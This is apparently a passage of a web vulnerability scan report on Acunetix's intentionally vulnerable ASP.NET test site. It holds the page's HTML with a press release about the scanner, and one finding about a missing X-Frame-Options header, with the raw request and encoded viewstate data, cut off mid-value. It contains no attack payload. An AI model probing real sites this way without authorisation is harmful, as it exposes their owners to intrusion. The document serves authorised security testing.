ICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMM7CCcDz0WSHUDA7sLxpWzaC0J1" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	POST
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 Content-Length: 3707 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,707 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC